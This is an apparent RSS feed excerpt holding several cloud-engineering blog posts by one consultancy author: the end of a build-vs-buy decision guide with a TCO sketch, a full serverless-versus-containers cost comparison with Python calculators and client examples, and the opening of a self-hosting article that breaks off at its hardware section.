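# Sketch of the 3-year TCO comparison: vendor quote x 1.4 for
# integration and compliance, build estimate x 2.5 for maintenance
# and opportunity cost over three years.

def three_year_tco(vendor_annual_quote, build_estimate):
    totals = {
        "buy": vendor_annual_quote * 3 * 1.4,  # 3 years of fees, plus 40%
        "build": build_estimate * 2.5,         # build cost, plus 150% over 3 years
    }
    totals["cheaper"] = min(("buy", "build"), key=totals.get)
    return totals

# Illustrative inputs: a $40K/year vendor quote vs a $250K build estimate.
result = three_year_tco(40_000, 250_000)
print(round(result["buy"]), round(result["build"]), result["cheaper"])
# 168000 625000 buy
```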

&lt;h3&gt;
  
  
  Question 4: What's the Blast Radius of Getting It Wrong?
&lt;/h3&gt;

&lt;p&gt;If you build and it fails, what happens? You've spent 6 months of engineering time and you buy the SaaS tool anyway. Bad, but recoverable.&lt;/p&gt;

&lt;p&gt;If you buy and it fails, what happens? You're locked into a contract, your data is in their format, and migrating is a 3-month project. Also bad, but also recoverable.&lt;/p&gt;

&lt;p&gt;The real risk isn't choosing wrong — it's choosing slowly. Analysis paralysis costs more than either wrong choice, because while you're deciding, your team is blocked.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Our rule:&lt;/strong&gt; If the 4 questions don't produce a clear answer within 2 weeks, default to buying. You can always build later with better information. You can't get back the 3 months you spent deliberating.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Decision Matrix
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;&lt;/th&gt;
&lt;th&gt;Core to Product&lt;/th&gt;
&lt;th&gt;Not Core&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Mature Market&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Build (reluctantly consider buying + heavy customization)&lt;/td&gt;
&lt;td&gt;Buy&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Immature Market&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Build&lt;/td&gt;
&lt;td&gt;Open-source + host, or wait&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;This matrix handles 90% of decisions. The remaining 10% are genuinely hard calls — and those are worth spending time on.&lt;/p&gt;
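&lt;p&gt;To make the defaults explicit, the matrix can be encoded as a tiny function. This is a hypothetical sketch: the two boolean inputs map directly to Questions 1 and 2, and the remaining hard cases still need human judgment.&lt;/p&gt;

```python
# The 2x2 decision matrix as code. Inputs correspond to
# Question 1 (core to product?) and Question 2 (mature market?).

def build_or_buy(core_to_product, market_is_mature):
    if core_to_product:
        return ("build (reluctantly consider buy + heavy customization)"
                if market_is_mature else "build")
    return "buy" if market_is_mature else "open-source + host, or wait"

print(build_or_buy(core_to_product=False, market_is_mature=True))   # buy
print(build_or_buy(core_to_product=False, market_is_mature=False))  # open-source + host, or wait
```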

&lt;h2&gt;
  
  
  Real Examples (Names Changed)
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Company A (Series B fintech, 80 engineers):&lt;/strong&gt; Spent 8 months building a custom feature flag system. Result: works, but fragile, maintained by one engineer. LaunchDarkly would have been $1,200/month. The custom system cost ~$400K in engineering time and continues to cost $80K/year in maintenance. Feature flags are not core to a fintech product. This was a $500K mistake.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Company B (Seed-stage dev tools, 12 engineers):&lt;/strong&gt; Bought a popular observability SaaS. 6 months later, their specific use case (eBPF-based kernel tracing) wasn't supported. They spent 4 months building custom integrations. Then the vendor raised prices 3x. They rebuilt on open-source (Grafana + Prometheus + custom exporters) in 6 weeks. The initial "buy" decision cost them 10 months. Observability WAS core to their product.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Company C (Growth-stage SaaS, 40 engineers):&lt;/strong&gt; Deliberated for 4 months about whether to build or buy an internal developer portal. While they deliberated, developer onboarding time stayed at 3 weeks. They eventually bought Backstage (open-source + host). The 4-month delay cost more than either option would have.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Build-vs-Buy Anti-Patterns
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;"We can build it in a weekend."&lt;/strong&gt; No, you can't. Building it takes a weekend. Making it production-ready takes a quarter. Maintaining it takes forever.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;"The vendor is too expensive."&lt;/strong&gt; Compare the vendor cost to the fully loaded cost of the engineering team that would build and maintain it. Include their salary, benefits, management overhead, and opportunity cost.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;"We need full control."&lt;/strong&gt; Of what, specifically? If you can articulate exactly what control you need and why, that's a valid argument. If "full control" is a vague feeling, it's not.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;"What if the vendor goes away?"&lt;/strong&gt; What if your key engineer goes away? Both are risks. Mature vendors with public pricing and data export capabilities are lower risk than most people think.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;"Let's build an MVP and see."&lt;/strong&gt; MVPs become permanent. If you're going to build, commit to building it properly. If you're not ready to commit, buy.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  The Conversation to Have With Your Team
&lt;/h2&gt;

&lt;p&gt;Before the next build-vs-buy decision, align on these principles:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Default to buying unless there's a clear reason to build.&lt;/strong&gt; This is counterintuitive for engineering teams, but it's the right default.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Set a 2-week decision deadline.&lt;/strong&gt; If you can't decide in 2 weeks, you don't have enough information, and more deliberation won't help. Default to buying and revisit in 6 months.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Document the decision and the reasoning.&lt;/strong&gt; In 18 months, you'll either validate or learn from it.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Review build-vs-buy decisions annually.&lt;/strong&gt; What you bought 2 years ago might be worth building now. What you built 2 years ago might be worth replacing.&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  The Annual Review Process
&lt;/h2&gt;

&lt;p&gt;Build-vs-buy decisions aren't permanent. The market changes, your team grows, and what was the right call 18 months ago may not be the right call today.&lt;/p&gt;

&lt;p&gt;We run an annual "infrastructure review" where we revisit every significant build-vs-buy decision from the past year. The template:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Decision&lt;/th&gt;
&lt;th&gt;Date&lt;/th&gt;
&lt;th&gt;Choice&lt;/th&gt;
&lt;th&gt;Reasoning&lt;/th&gt;
&lt;th&gt;Outcome&lt;/th&gt;
&lt;th&gt;Would We Decide Differently Today?&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Monitoring stack&lt;/td&gt;
&lt;td&gt;2025-Q1&lt;/td&gt;
&lt;td&gt;Build (Grafana+Prometheus)&lt;/td&gt;
&lt;td&gt;Core to our ops, no SaaS matched our needs&lt;/td&gt;
&lt;td&gt;Excellent — saved ~$4K/month vs Datadog&lt;/td&gt;
&lt;td&gt;No change&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Feature flags&lt;/td&gt;
&lt;td&gt;2025-Q2&lt;/td&gt;
&lt;td&gt;Buy (LaunchDarkly)&lt;/td&gt;
&lt;td&gt;Not core, mature market&lt;/td&gt;
&lt;td&gt;Good — $1,200/month, zero maintenance&lt;/td&gt;
&lt;td&gt;No change&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AI inference&lt;/td&gt;
&lt;td&gt;2025-Q3&lt;/td&gt;
&lt;td&gt;Build (self-hosted)&lt;/td&gt;
&lt;td&gt;Cost at scale, data residency&lt;/td&gt;
&lt;td&gt;Mixed — 3.8x savings but ops burden is real&lt;/td&gt;
&lt;td&gt;Would start hybrid earlier&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CI/CD&lt;/td&gt;
&lt;td&gt;2025-Q1&lt;/td&gt;
&lt;td&gt;Optimize existing (GitHub Actions)&lt;/td&gt;
&lt;td&gt;Already invested, just needed tuning&lt;/td&gt;
&lt;td&gt;Excellent — &lt;a href="https://www.techsaas.cloud/blog/cicd-pipeline-optimization-20min-to-3min" rel="noopener noreferrer"&gt;85% faster builds, $0 additional cost&lt;/a&gt;
&lt;/td&gt;
&lt;td&gt;No change&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The review takes half a day. The insights it produces — "we under-budgeted maintenance on that build decision" or "the vendor we chose just tripled their pricing" — are worth weeks of retrospective analysis.&lt;/p&gt;

&lt;h2&gt;
  
  
  Build vs Buy in Specific Domains
&lt;/h2&gt;

&lt;p&gt;The framework is universal, but the common answers vary by domain:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Infrastructure tooling (CI/CD, monitoring, logging):&lt;/strong&gt; Usually buy or open-source-and-host. Unless you're a dev tools company, your CI pipeline is not your competitive advantage. We wrote about &lt;a href="https://www.techsaas.cloud/blog/cicd-pipeline-optimization-20min-to-3min" rel="noopener noreferrer"&gt;optimizing CI/CD without buying expensive tools&lt;/a&gt; — the point is that optimization of existing tools often outperforms buying replacements.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;AI/ML infrastructure:&lt;/strong&gt; Increasingly a build decision at scale. When your API bill crosses $10K/month, the build case strengthens dramatically. We documented the &lt;a href="https://www.techsaas.cloud/blog/self-hosted-llm-cost-comparison-production" rel="noopener noreferrer"&gt;exact break-even analysis for self-hosted LLMs&lt;/a&gt; — the framework in this article directly informed that decision.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Security tooling (secrets management, scanning):&lt;/strong&gt; Almost always buy or open-source-and-host. Building your own security tools is a recipe for false confidence. &lt;a href="https://www.techsaas.cloud/blog/secret-management-best-practices-devops" rel="noopener noreferrer"&gt;HashiCorp Vault is free and battle-tested&lt;/a&gt; — there's no build case here unless you're HashiCorp.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Cloud strategy:&lt;/strong&gt; The build-vs-buy mindset applies to cloud decisions too. Going &lt;a href="https://www.techsaas.cloud/blog/multi-cloud-hidden-costs-pitfalls" rel="noopener noreferrer"&gt;multi-cloud for "vendor lock-in avoidance"&lt;/a&gt; is essentially choosing to "build" a portable abstraction layer when you could "buy" (commit to) a single cloud provider's native services. Apply the same framework: is cloud portability core to your product? Probably not.&lt;/p&gt;

&lt;h2&gt;
  
  
  Frequently Asked Questions
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Q: What if my CEO insists on building because "we're an engineering company"?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;This is the most common source of bad build decisions. The fact that you have engineers doesn't mean every problem should be solved with custom engineering. Reframe the conversation around opportunity cost: every engineer building internal tooling is an engineer NOT building customer-facing features. Ask: "If we had 3 extra engineers for 6 months, would you rather have a custom feature flag system or 3 new product features?"&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Q: How do I handle sunk cost bias? We've already built half of it.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Ignore sunk costs. The only relevant question is: "Given where we are today, is the cost of finishing + maintaining the custom solution less than the cost of switching to a vendor?" If the vendor is cheaper going forward, switch — even if you've spent 6 months building. The 6 months are gone either way.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Q: Should I build for competitive reasons — to avoid giving data to vendors?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;This is a legitimate concern for specific categories: customer data in analytics tools, proprietary algorithms in ML platforms, sensitive code in CI systems. But it's overused as a justification. Your company Slack messages are not competitive intelligence. Your CI logs are not trade secrets. Be specific about what data you're protecting and why.&lt;/p&gt;

&lt;h2&gt;
  
  
  Related Reading
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://www.techsaas.cloud/blog/self-hosted-llm-cost-comparison-production" rel="noopener noreferrer"&gt;Self-Hosted LLMs vs API&lt;/a&gt; — a detailed build vs buy analysis for AI infrastructure&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.techsaas.cloud/blog/cicd-pipeline-optimization-20min-to-3min" rel="noopener noreferrer"&gt;CI/CD Pipeline Optimization&lt;/a&gt; — why optimizing beats replacing&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.techsaas.cloud/blog/multi-cloud-hidden-costs-pitfalls" rel="noopener noreferrer"&gt;Multi-Cloud Pitfalls&lt;/a&gt; — build vs buy applied to cloud strategy decisions&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;We help engineering teams make infrastructure decisions that stick. If you're facing a build-vs-buy decision on infrastructure or platform tooling, we've been through it dozens of times.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;a href="https://www.techsaas.cloud/services/" rel="noopener noreferrer"&gt;Talk to our engineering team →&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Subscribe to our newsletter for weekly deep-dives into engineering leadership decisions.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>webdev</category>
      <category>tutorial</category>
      <category>programming</category>
      <category>devops</category>
    </item>
    <item>
      <title>Serverless vs Containers: The Decision Framework That Saves CTOs From $10K/Month Mistakes</title>
      <dc:creator>Yash Pritwani</dc:creator>
      <pubDate>Wed, 22 Apr 2026 06:00:54 +0000</pubDate>
      <link>https://forem.com/yash_pritwani_07a77613fd6/serverless-vs-containers-the-decision-framework-that-saves-ctos-from-10kmonth-mistakes-14b6</link>
      <guid>https://forem.com/yash_pritwani_07a77613fd6/serverless-vs-containers-the-decision-framework-that-saves-ctos-from-10kmonth-mistakes-14b6</guid>
      <description>&lt;p&gt;&lt;em&gt;Originally published on &lt;a href="https://www.techsaas.cloud/blog/serverless-vs-containers-decision-framework" rel="noopener noreferrer"&gt;TechSaaS Cloud&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;








&lt;h1&gt;
  
  
  Serverless vs Containers: The Decision Framework That Saves CTOs From $10K/Month Mistakes
&lt;/h1&gt;

&lt;p&gt;The serverless vs containers debate isn't a technology debate. It's a math debate disguised as a technology debate. And most teams pick the wrong answer because they're arguing about architecture when they should be running a spreadsheet.&lt;/p&gt;

&lt;p&gt;We've migrated workloads in both directions — Lambda to containers when costs spiraled, and containers to Lambda when teams were over-provisioning. The pattern is always the same: teams pick based on hype, then discover the economics don't work for their specific workload. By then they've spent six months building on the wrong foundation.&lt;/p&gt;

&lt;p&gt;Here's the decision framework we use for every client engagement. It's not opinionated — it's mathematical.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Break-Even Point Nobody Talks About
&lt;/h2&gt;

&lt;p&gt;Lambda's pricing model is beautiful for low-traffic applications. You pay per invocation, per millisecond of compute time. When your app is idle, you pay zero. That's genuinely revolutionary.&lt;/p&gt;

&lt;p&gt;But the pricing model has a dirty secret: your bill keeps scaling linearly with traffic forever, while container costs grow in coarse, amortized steps. As your traffic grows, Lambda becomes progressively more expensive relative to containers because:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;You pay per-request overhead.&lt;/strong&gt; Every invocation has a base cost regardless of duration.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cold starts add latency AND cost.&lt;/strong&gt; Provisioned concurrency (the fix for cold starts) costs money whether invocations happen or not — eliminating the "pay only for what you use" advantage.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;No resource sharing.&lt;/strong&gt; Each function invocation gets its own compute allocation. Containers share resources across requests, amortizing the overhead.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The break-even point for most workloads: approximately 30 million invocations per month at 200ms average duration. Below that, Lambda is cheaper. Above that, containers are cheaper — and the gap widens with every million additional invocations.&lt;/p&gt;
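&lt;p&gt;You can reproduce the break-even check with a back-of-envelope calculator. The pricing constants below are illustrative approximations of published us-east-1 rates at the time of writing; check current pricing and your own container sizing before deciding, since the crossover point moves with both.&lt;/p&gt;

```python
# Rough monthly cost comparison behind the break-even claim.
# All rates are illustrative approximations -- verify against
# current AWS pricing before acting on the result.

LAMBDA_PER_REQUEST = 0.20 / 1_000_000   # $ per invocation
LAMBDA_PER_GB_SECOND = 0.0000166667     # $ per GB-second of compute
FARGATE_VCPU_HOUR = 0.04048             # $ per vCPU-hour
FARGATE_GB_HOUR = 0.004445              # $ per GB-hour
HOURS_PER_MONTH = 730

def lambda_monthly(invocations, avg_duration_s, memory_gb):
    requests = invocations * LAMBDA_PER_REQUEST
    compute = invocations * avg_duration_s * memory_gb * LAMBDA_PER_GB_SECOND
    return requests + compute

def fargate_monthly(tasks, vcpu_per_task, gb_per_task):
    per_task_hour = (vcpu_per_task * FARGATE_VCPU_HOUR
                     + gb_per_task * FARGATE_GB_HOUR)
    return tasks * per_task_hour * HOURS_PER_MONTH

# 30M invocations/month at 200ms with 1GB functions,
# vs 2 always-on 1 vCPU / 2GB Fargate tasks.
print(round(lambda_monthly(30_000_000, 0.2, 1.0), 2))   # ~106
print(round(fargate_monthly(2, 1.0, 2.0), 2))           # ~72
```

With these illustrative numbers, Lambda already costs more at 30 million invocations, and that's before provisioned concurrency is added to the Lambda side.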

&lt;h2&gt;
  
  
  Real Numbers From Client Migrations
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Client A: Webhook Processor (Lambda Wins)
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Workload:&lt;/strong&gt; Process incoming webhooks from 200+ integrations&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Traffic pattern:&lt;/strong&gt; Extremely bursty. 90% idle time. Peaks of 500 RPS during batch sends.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Lambda cost:&lt;/strong&gt; $180/month&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Equivalent container cost:&lt;/strong&gt; ~$400/month (need enough instances to handle peaks, paying for idle time)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Decision:&lt;/strong&gt; Stay on Lambda. The bursty traffic pattern is exactly what serverless is designed for.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Client B: REST API (Containers Win by 6x)
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Workload:&lt;/strong&gt; Customer-facing REST API, steady traffic&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Traffic pattern:&lt;/strong&gt; 2.3 million requests per day, consistent throughout business hours&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Lambda cost:&lt;/strong&gt; $8,200/month (with provisioned concurrency for acceptable latency)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Fargate cost:&lt;/strong&gt; $1,400/month (2 services, auto-scaling 2-8 tasks)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Decision:&lt;/strong&gt; Migrated to Fargate. Steady traffic means Lambda's per-request pricing works against you. The provisioned concurrency bill alone was $4,000.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Client C: ML Inference (Containers Win by 7x)
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Workload:&lt;/strong&gt; Document classification pipeline, medium-sized models&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Traffic pattern:&lt;/strong&gt; 50K requests/day, models need warm loading&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Lambda cost:&lt;/strong&gt; $14,000/month (hitting timeout limits, cold starts loading models)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Self-hosted GPU containers:&lt;/strong&gt; $2,100/month (leased A10, models stay warm)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Decision:&lt;/strong&gt; Migrated to self-hosted containers. Lambda's 15-minute timeout and cold start penalty for large memory functions made it technically wrong AND economically wrong.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  The Decision Matrix
&lt;/h2&gt;

&lt;p&gt;Use this framework for any new workload:&lt;/p&gt;

&lt;h3&gt;
  
  
  Choose Serverless When:
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Traffic is unpredictable or bursty.&lt;/strong&gt; If your service goes from 0 to 10,000 RPS and back to 0 within minutes, serverless handles this automatically. Containers require over-provisioning for peaks, wasting money during valleys.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Functions are short-lived.&lt;/strong&gt; Under 30 seconds execution time. Ideally under 5 seconds. If your workload consistently runs longer, you're fighting Lambda's pricing model.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The team is small and ops-averse.&lt;/strong&gt; No patching, no scaling decisions, no capacity planning. For a team of 3 engineers shipping an MVP, the ops overhead of containers isn't worth it.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Workloads are event-driven.&lt;/strong&gt; S3 triggers, SQS processing, cron jobs that run once per hour, webhook handlers. These are Lambda's sweet spot — truly pay-per-use.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;You're prototyping.&lt;/strong&gt; Need to validate an idea in a week? Lambda gets you from code to production with zero infrastructure decisions.&lt;/p&gt;

&lt;h3&gt;
  
  
  Choose Containers When:
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Traffic is sustained and predictable.&lt;/strong&gt; More than 1 million requests per day with a consistent pattern. The per-request overhead of Lambda adds up fast.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;You need persistent connections.&lt;/strong&gt; WebSockets, gRPC streams, long-polling, SSE. Lambda's request-response model doesn't support these patterns.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Cold start latency is unacceptable.&lt;/strong&gt; Even with provisioned concurrency, Lambda cold starts add 100-500ms for basic functions and 1-5 seconds for functions with large dependencies. Containers start once and serve thousands of requests.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;You need local state or caching.&lt;/strong&gt; In-memory caches, connection pools, loaded ML models. Lambda functions are stateless by design — every optimization that relies on state breaks the model.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Your monthly serverless bill exceeds $3,000.&lt;/strong&gt; This is the inflection point where the math almost always favors containers. Run the actual comparison.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Hybrid Approach (What We Recommend)
&lt;/h3&gt;

&lt;p&gt;Most production systems shouldn't be 100% either. The winning pattern:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Containers&lt;/strong&gt; for your core services: APIs, web servers, databases, queues, anything with sustained traffic&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Serverless&lt;/strong&gt; for glue code: event processing, file transformations, scheduled jobs, webhooks, async background tasks&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This hybrid approach typically costs 60-70% less than going all-in on either strategy.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Migration Playbook
&lt;/h2&gt;

&lt;p&gt;If you've determined you're on the wrong architecture, here's the migration path:&lt;/p&gt;

&lt;h3&gt;
  
  
  Lambda → Containers:
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Identify the expensive functions.&lt;/strong&gt; Sort by monthly cost. Usually 3-5 functions account for 80% of your Lambda bill.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Group by latency requirement.&lt;/strong&gt; Functions that need sub-100ms response go into your primary service. Batch functions can be background workers.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Containerize incrementally.&lt;/strong&gt; Move one function at a time. Keep Lambda as a fallback for 2 weeks after each migration.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Right-size from day one.&lt;/strong&gt; Use actual traffic data to size your containers. Don't guess — check CloudWatch metrics for peak and average utilization.&lt;/li&gt;
&lt;/ol&gt;
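&lt;p&gt;Step 1 can be sketched in a few lines. The function names and dollar figures below are invented for illustration; in practice the input comes from your billing breakdown.&lt;/p&gt;

```python
# Rank Lambda functions by monthly cost and keep the head of the
# list that covers 80% of the bill -- those migrate first.

monthly_cost = {
    "api-handler": 4200, "image-resize": 1900, "report-gen": 1100,
    "webhook-fanout": 450, "cron-cleanup": 90, "audit-log": 60,
}

ranked = sorted(monthly_cost.items(), key=lambda kv: kv[1], reverse=True)
cutoff = 0.8 * sum(monthly_cost.values())

running, migrate_first = 0, []
for name, cost in ranked:
    migrate_first.append(name)
    running += cost
    if running >= cutoff:
        break

print(migrate_first)  # the few functions worth containerizing first
```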

&lt;h3&gt;
  
  
  Containers → Lambda:
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Identify low-utilization services.&lt;/strong&gt; If a container averages under 10% CPU, it's a candidate for serverless.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Check for state dependencies.&lt;/strong&gt; Any in-memory cache, connection pool, or loaded model means the function needs provisioned concurrency — factor that cost in.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Extract event-driven logic.&lt;/strong&gt; Cron jobs, webhook handlers, and async processors are the lowest-risk migrations.&lt;/li&gt;
&lt;/ol&gt;
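&lt;p&gt;The reverse direction can be screened the same way. This is an illustrative filter combining steps 1 and 2: flag services under 10% average CPU, and exclude stateful ones, since provisioned concurrency erodes the savings. The service entries are made up.&lt;/p&gt;

```python
# Containers -> Lambda candidate filter: low average CPU and no
# in-memory state (cache, connection pool, loaded model).

services = [
    {"name": "billing-api", "avg_cpu": 0.42, "stateful": True},
    {"name": "pdf-export", "avg_cpu": 0.04, "stateful": False},
    {"name": "geo-cache", "avg_cpu": 0.06, "stateful": True},
]

candidates = [s["name"] for s in services
              if 0.10 > s["avg_cpu"] and not s["stateful"]]
print(candidates)  # ['pdf-export']
```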

&lt;h2&gt;
  
  
  Common Mistakes
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;"Serverless is always cheaper."&lt;/strong&gt; It's cheaper at low scale. It's expensive at high scale. The marketing materials show the low-scale numbers.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;"Containers are too complex."&lt;/strong&gt; Fargate and Cloud Run eliminate most operational overhead. You don't need to manage EC2 instances to run containers.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;"We'll optimize Lambda later."&lt;/strong&gt; Lambda cost optimization (reducing memory, optimizing cold starts, batching) has diminishing returns. If the architecture is wrong, no optimization saves you.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;"Our traffic might spike someday."&lt;/strong&gt; Design for today's traffic with the ability to scale. Don't pay 6x more today because traffic might spike in 18 months. You can migrate later.&lt;/p&gt;

&lt;h2&gt;
  
  
  The One Question That Cuts Through the Debate
&lt;/h2&gt;

&lt;p&gt;Ask yourself: "If my traffic doubles next month, does my bill double or stay roughly the same?"&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;If it doubles: you're on serverless or poorly sized containers.&lt;/li&gt;
&lt;li&gt;If it stays roughly the same: you're on well-sized containers.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;For sustained workloads, you want the second answer. For unpredictable workloads, the first answer is actually correct — you'd rather your bill scale with actual usage than pay for unused capacity.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;At &lt;a href="https://www.techsaas.cloud/services/" rel="noopener noreferrer"&gt;TechSaaS&lt;/a&gt;, we help teams make this decision with real data, not gut feelings. We'll analyze your current architecture, run the cost comparison, and build the migration plan if the math says you should move. Most clients save 40-70% on their cloud bill within the first month after migration.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>webdev</category>
      <category>tutorial</category>
      <category>programming</category>
      <category>devops</category>
    </item>
    <item>
      <title>Self-Hosting in 2026: The Complete Infrastructure Stack (82 Containers, $0 Cloud Bill)</title>
      <dc:creator>Yash Pritwani</dc:creator>
      <pubDate>Wed, 22 Apr 2026 06:00:21 +0000</pubDate>
      <link>https://forem.com/yash_pritwani_07a77613fd6/self-hosting-in-2026-the-complete-infrastructure-stack-82-containers-0-cloud-bill-5e47</link>
      <guid>https://forem.com/yash_pritwani_07a77613fd6/self-hosting-in-2026-the-complete-infrastructure-stack-82-containers-0-cloud-bill-5e47</guid>
      <description>&lt;p&gt;&lt;em&gt;Originally published on &lt;a href="https://www.techsaas.cloud/blog/self-hosting-2026-infrastructure-stack" rel="noopener noreferrer"&gt;TechSaaS Cloud&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;








&lt;h1&gt;
  
  
  Self-Hosting in 2026: The Complete Infrastructure Stack
&lt;/h1&gt;

&lt;p&gt;We run 82 production containers on a single physical server. Grafana, Prometheus, Gitea, Directus CMS, n8n automation, Loki logging, PostgreSQL, Redis, FalkorDB, multiple AI models, and dozens of web applications. Our monthly cloud bill is zero dollars.&lt;/p&gt;

&lt;p&gt;This isn't a hobby project. This is production infrastructure serving real users, with 99.9% uptime over the last year, automated backups, monitoring that pages us before users notice issues, and CI/CD that deploys on every push.&lt;/p&gt;

&lt;p&gt;The 2026 self-hosting stack is a fundamentally different proposition than it was even two years ago. The tooling has matured. Docker Compose handles orchestration that once required Kubernetes. Cloudflare Tunnels provide zero-trust access without opening any ports. Reverse proxies auto-provision SSL certificates. And the economics have shifted — cloud costs have risen 15-20% while hardware costs have dropped.&lt;/p&gt;

&lt;p&gt;Here's the exact stack, why we chose each component, and the real numbers.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Hardware Layer
&lt;/h2&gt;

